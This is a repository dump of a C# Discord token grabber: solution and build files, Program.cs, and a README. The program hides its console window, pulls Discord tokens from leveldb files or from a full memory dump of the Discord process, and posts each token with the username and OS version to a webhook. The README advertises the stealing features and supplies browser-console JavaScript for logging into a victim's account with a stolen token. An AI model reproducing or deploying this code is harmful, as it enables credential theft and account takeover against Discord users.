├── Discord-Token-Grabber
├── Discord-Token-Grabber.sln
└── Discord-Token-Grabber
│ ├── Discord-Token-Grabber.csproj
│ ├── Program.cs
│ ├── bin
│ └── Debug
│ │ └── netcoreapp3.1
│ │ ├── Discord-Token-Grabber.deps.json
│ │ ├── Discord-Token-Grabber.dll
│ │ ├── Discord-Token-Grabber.pdb
│ │ ├── Discord-Token-Grabber.runtimeconfig.dev.json
│ │ └── Discord-Token-Grabber.runtimeconfig.json
│ └── obj
│ ├── Debug
│ └── netcoreapp3.1
│ │ ├── Discord-Token-Grabber.AssemblyInfo.cs
│ │ ├── Discord-Token-Grabber.AssemblyInfoInputs.cache
│ │ ├── Discord-Token-Grabber.assets.cache
│ │ ├── Discord-Token-Grabber.csproj.CoreCompileInputs.cache
│ │ ├── Discord-Token-Grabber.csproj.FileListAbsolute.txt
│ │ ├── Discord-Token-Grabber.csprojAssemblyReference.cache
│ │ ├── Discord-Token-Grabber.dll
│ │ ├── Discord-Token-Grabber.genruntimeconfig.cache
│ │ ├── Discord-Token-Grabber.pdb
│ │ └── apphost.exe
│ ├── Discord-Token-Grabber.csproj.nuget.dgspec.json
│ ├── Discord-Token-Grabber.csproj.nuget.g.props
│ ├── Discord-Token-Grabber.csproj.nuget.g.targets
│ ├── project.assets.json
│ └── project.nuget.cache
└── README.md
/Discord-Token-Grabber/Discord-Token-Grabber.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31105.61
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Discord-Token-Grabber", "Discord-Token-Grabber\Discord-Token-Grabber.csproj", "{2DED72DC-F4D9-4976-AA5F-521AEE7182EC}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {2DED72DC-F4D9-4976-AA5F-521AEE7182EC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {2DED72DC-F4D9-4976-AA5F-521AEE7182EC}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {2DED72DC-F4D9-4976-AA5F-521AEE7182EC}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {2DED72DC-F4D9-4976-AA5F-521AEE7182EC}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {6AB14DC8-9874-4413-BE41-CC01E73DADBA}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/Discord-Token-Grabber.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 | Discord_Token_Grabber
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 | using System.IO;
5 | using System.Text.RegularExpressions;
6 | using System.Text;
7 | using System.Collections.Specialized;
8 | using System.Net;
9 | namespace DiscordTokenStealer
10 | {
11 | class Program
12 | {
13 | public enum MINIDUMP_TYPE
14 | {
15 | MiniDumpWithFullMemory = 0x00000002,
16 | }
17 |
18 | [DllImport("dbghelp.dll", SetLastError = true)]
19 | static extern bool MiniDumpWriteDump(
20 | IntPtr hProcess,
21 | UInt32 ProcessId,
22 | SafeHandle hFile,
23 | MINIDUMP_TYPE DumpType,
24 | IntPtr ExceptionParam,
25 | IntPtr UserStreamParam,
26 | IntPtr CallbackParam);
27 |
28 |
29 | static int SW_HIDE = 0;
30 | [DllImport("user32.dll")]
31 | static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
32 | [DllImport("kernel32.dll")]
33 | static extern IntPtr GetConsoleWindow();
34 |
35 | public class Discord
36 | {
37 | static void HideMe()
38 | {
39 | IntPtr myWindow = GetConsoleWindow();
40 | ShowWindow(myWindow, SW_HIDE);
41 | }
42 | static bool LdbGrab()
43 | {
44 | string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\discord\Local Storage\leveldb";
45 | Regex regex = new Regex(@"[\w-]{24}\.[\w-]{6}\.[\w-]{27}");
46 |
47 | string[] dbfiles = Directory.GetFiles(path, "*.ldb", SearchOption.AllDirectories);
48 |
49 | if (Directory.Exists(path))
50 | {
51 | foreach (var file in dbfiles)
52 | {
53 | FileInfo info = new FileInfo(file);
54 | string contents = File.ReadAllText(info.FullName);
55 | Match match = regex.Match(contents);
56 | if (match.Success)
57 | {
58 | Discord.Send("Token : " + match.Value + "\nUserName : " + Environment.UserName + "\nOS : " + Environment.OSVersion);
59 | return true;
60 | }
61 | }
62 | }
63 | return false;
64 | }
65 | public class Http
66 | {
67 | public static byte[] Post(string url, NameValueCollection pairs)
68 | {
69 | using (WebClient webClient = new WebClient())
70 | return webClient.UploadValues(url, pairs);
71 | }
72 | }
73 | static bool ExtractTok(string fn)
74 | {
75 | Regex regex = new Regex(@"[\w-]{24}\.[\w-]{6}\.[\w-]{27}");
76 | FileInfo info = new FileInfo(fn);
77 | if (info.Exists)
78 | {
79 | string contents = File.ReadAllText(info.FullName);
80 | Match match = regex.Match(contents);
81 | if (match.Success)
82 | {
83 | Discord.Send("Token : " + match.Value + "\nUserName : " + Environment.UserName + "\nOS : " + Environment.OSVersion );
84 | return true;
85 | }
86 |
87 | else
88 | return false;
89 | }
90 | else
91 | Console.WriteLine("dump file not found !!");
92 | return false;
93 | }
94 | public static void Send(string content)
95 | {
96 | string webHookUrl = "webhook";
97 | Http.Post(webHookUrl, new NameValueCollection()
98 | {
99 | {
100 | "content", content
101 | },
102 |
103 | {
104 | "username", "Skinjbir"
105 | },
106 |
107 | {
108 | "avatar_url", "https://i.imgur.com/jFZIN2t.jpg"
109 | }
110 |
111 | });
112 | }
113 |
114 | static void Main()
115 | {
116 | Program.Discord.HideMe();
117 | string fo = "discord.dmp";
118 | if (!Program.Discord.LdbGrab())
119 | {
120 | foreach (Process proid in Process.GetProcessesByName("discord"))
121 | {
122 | UInt32 ProcessId = (uint)proid.Id;
123 | IntPtr hProcess = proid.Handle;
124 | MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
125 | string out_dump_path = Path.Combine(Directory.GetCurrentDirectory(), "discord.dmp");
126 | FileStream procdumpFileStream = File.Create(out_dump_path);
127 | bool success = MiniDumpWriteDump(hProcess, ProcessId, procdumpFileStream.SafeFileHandle, DumpType, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
128 | procdumpFileStream.Close();
129 | if (Program.Discord.ExtractTok(fo))
130 | System.Environment.Exit(1);
131 | File.Delete(fo);
132 | }
133 | }
134 | Environment.Exit(0);
135 |
136 | }
137 | }
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "Discord-Token-Grabber/1.0.0": {
10 | "runtime": {
11 | "Discord-Token-Grabber.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "Discord-Token-Grabber/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.dll
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.pdb
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\anas\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\anas\\.nuget\\packages",
6 | "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages"
7 | ]
8 | }
9 | }
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/bin/Debug/netcoreapp3.1/Discord-Token-Grabber.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | using System;
12 | using System.Reflection;
13 |
14 | [assembly: System.Reflection.AssemblyCompanyAttribute("Discord-Token-Grabber")]
15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")]
16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")]
17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")]
18 | [assembly: System.Reflection.AssemblyProductAttribute("Discord-Token-Grabber")]
19 | [assembly: System.Reflection.AssemblyTitleAttribute("Discord-Token-Grabber")]
20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")]
21 |
22 | // Generated by the MSBuild WriteCodeFragment class.
23 |
24 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0846b449a6f38c0b4d5e985e54ebea334717fcaf
2 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.assets.cache
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 0ffbd7a633ec34fc2b113de708e6763036563a51
2 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\bin\Debug\netcoreapp3.1\Discord-Token-Grabber.exe
2 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\bin\Debug\netcoreapp3.1\Discord-Token-Grabber.deps.json
3 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\bin\Debug\netcoreapp3.1\Discord-Token-Grabber.runtimeconfig.json
4 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\bin\Debug\netcoreapp3.1\Discord-Token-Grabber.runtimeconfig.dev.json
5 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\bin\Debug\netcoreapp3.1\Discord-Token-Grabber.dll
6 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\bin\Debug\netcoreapp3.1\Discord-Token-Grabber.pdb
7 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.csprojAssemblyReference.cache
8 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.AssemblyInfoInputs.cache
9 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.AssemblyInfo.cs
10 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.csproj.CoreCompileInputs.cache
11 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.dll
12 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.pdb
13 | C:\Users\anas\Source\Repos\Discord-Token-Grabber\Discord-Token-Grabber\obj\Debug\netcoreapp3.1\Discord-Token-Grabber.genruntimeconfig.cache
14 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.csprojAssemblyReference.cache
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.dll
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 080c8c13fc1f085c865b2704ea005b0c9b81364e
2 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/Discord-Token-Grabber.pdb
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/DeadLight/67828958fa4f65529d12090fc865188c0816f49d/Discord-Token-Grabber/Discord-Token-Grabber/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Discord-Token-Grabber.csproj.nuget.dgspec.json:
--------------------------------------------------------------------------------
1 | {
2 | "format": 1,
3 | "restore": {
4 | "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj": {}
5 | },
6 | "projects": {
7 | "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj": {
8 | "version": "1.0.0",
9 | "restore": {
10 | "projectUniqueName": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj",
11 | "projectName": "Discord-Token-Grabber",
12 | "projectPath": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj",
13 | "packagesPath": "C:\\Users\\anas\\.nuget\\packages\\",
14 | "outputPath": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\obj\\",
15 | "projectStyle": "PackageReference",
16 | "fallbackFolders": [
17 | "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages"
18 | ],
19 | "configFilePaths": [
20 | "C:\\Users\\anas\\AppData\\Roaming\\NuGet\\NuGet.Config",
21 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.FallbackLocation.config",
22 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config"
23 | ],
24 | "originalTargetFrameworks": [
25 | "netcoreapp3.1"
26 | ],
27 | "sources": {
28 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {},
29 | "https://api.nuget.org/v3/index.json": {}
30 | },
31 | "frameworks": {
32 | "netcoreapp3.1": {
33 | "targetAlias": "netcoreapp3.1",
34 | "projectReferences": {}
35 | }
36 | },
37 | "warningProperties": {
38 | "warnAsError": [
39 | "NU1605"
40 | ]
41 | }
42 | },
43 | "frameworks": {
44 | "netcoreapp3.1": {
45 | "targetAlias": "netcoreapp3.1",
46 | "imports": [
47 | "net461",
48 | "net462",
49 | "net47",
50 | "net471",
51 | "net472",
52 | "net48"
53 | ],
54 | "assetTargetFallback": true,
55 | "warn": true,
56 | "frameworkReferences": {
57 | "Microsoft.NETCore.App": {
58 | "privateAssets": "all"
59 | }
60 | },
61 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\5.0.201\\RuntimeIdentifierGraph.json"
62 | }
63 | }
64 | }
65 | }
66 | }
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Discord-Token-Grabber.csproj.nuget.g.props:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | True
5 | NuGet
6 | $(MSBuildThisFileDirectory)project.assets.json
7 | $(UserProfile)\.nuget\packages\
8 | C:\Users\anas\.nuget\packages\;C:\Program Files (x86)\Microsoft Visual Studio\Shared\NuGetPackages
9 | PackageReference
10 | 5.9.0
11 |
12 |
13 |
14 |
15 |
16 |
17 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
18 |
19 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/Discord-Token-Grabber.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/project.assets.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": 3,
3 | "targets": {
4 | ".NETCoreApp,Version=v3.1": {}
5 | },
6 | "libraries": {},
7 | "projectFileDependencyGroups": {
8 | ".NETCoreApp,Version=v3.1": []
9 | },
10 | "packageFolders": {
11 | "C:\\Users\\anas\\.nuget\\packages\\": {},
12 | "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages": {}
13 | },
14 | "project": {
15 | "version": "1.0.0",
16 | "restore": {
17 | "projectUniqueName": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj",
18 | "projectName": "Discord-Token-Grabber",
19 | "projectPath": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj",
20 | "packagesPath": "C:\\Users\\anas\\.nuget\\packages\\",
21 | "outputPath": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\obj\\",
22 | "projectStyle": "PackageReference",
23 | "fallbackFolders": [
24 | "C:\\Program Files (x86)\\Microsoft Visual Studio\\Shared\\NuGetPackages"
25 | ],
26 | "configFilePaths": [
27 | "C:\\Users\\anas\\AppData\\Roaming\\NuGet\\NuGet.Config",
28 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.FallbackLocation.config",
29 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config"
30 | ],
31 | "originalTargetFrameworks": [
32 | "netcoreapp3.1"
33 | ],
34 | "sources": {
35 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {},
36 | "https://api.nuget.org/v3/index.json": {}
37 | },
38 | "frameworks": {
39 | "netcoreapp3.1": {
40 | "targetAlias": "netcoreapp3.1",
41 | "projectReferences": {}
42 | }
43 | },
44 | "warningProperties": {
45 | "warnAsError": [
46 | "NU1605"
47 | ]
48 | }
49 | },
50 | "frameworks": {
51 | "netcoreapp3.1": {
52 | "targetAlias": "netcoreapp3.1",
53 | "imports": [
54 | "net461",
55 | "net462",
56 | "net47",
57 | "net471",
58 | "net472",
59 | "net48"
60 | ],
61 | "assetTargetFallback": true,
62 | "warn": true,
63 | "frameworkReferences": {
64 | "Microsoft.NETCore.App": {
65 | "privateAssets": "all"
66 | }
67 | },
68 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\5.0.201\\RuntimeIdentifierGraph.json"
69 | }
70 | }
71 | }
72 | }
--------------------------------------------------------------------------------
/Discord-Token-Grabber/Discord-Token-Grabber/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "/lemfp9HyDsl4yiBGNzmH5ucovhDy5V/JT0qexSoFWKaOFC91ZQJfWXgN2khbNSrFt/afzyEsWEJ1mxc68HTkQ==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\anas\\Source\\Repos\\Discord-Token-Grabber\\Discord-Token-Grabber\\Discord-Token-Grabber.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Discord-Token-Grabber
2 | 
3 |
4 | # Features
5 | * Steal
6 | * Token directly From memory
7 | * Token from ldb files
8 | * username
9 | * os version
10 | * bypass any kind of token protection
11 |
12 |
13 | # How to login using token
14 | * open inspect element in https://discord.com/ ,copy and paste this code in console
15 |
16 | ```js
17 | function login(token) {
18 | setInterval(() => {
19 | document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
20 | }, 50);
21 | setTimeout(() => {
22 | location.reload();
23 | }, 2500);
24 | }
25 | ```
26 | * use `login("token");` then refresh the webpage ,and you will login automatically to the account using only token
27 |
--------------------------------------------------------------------------------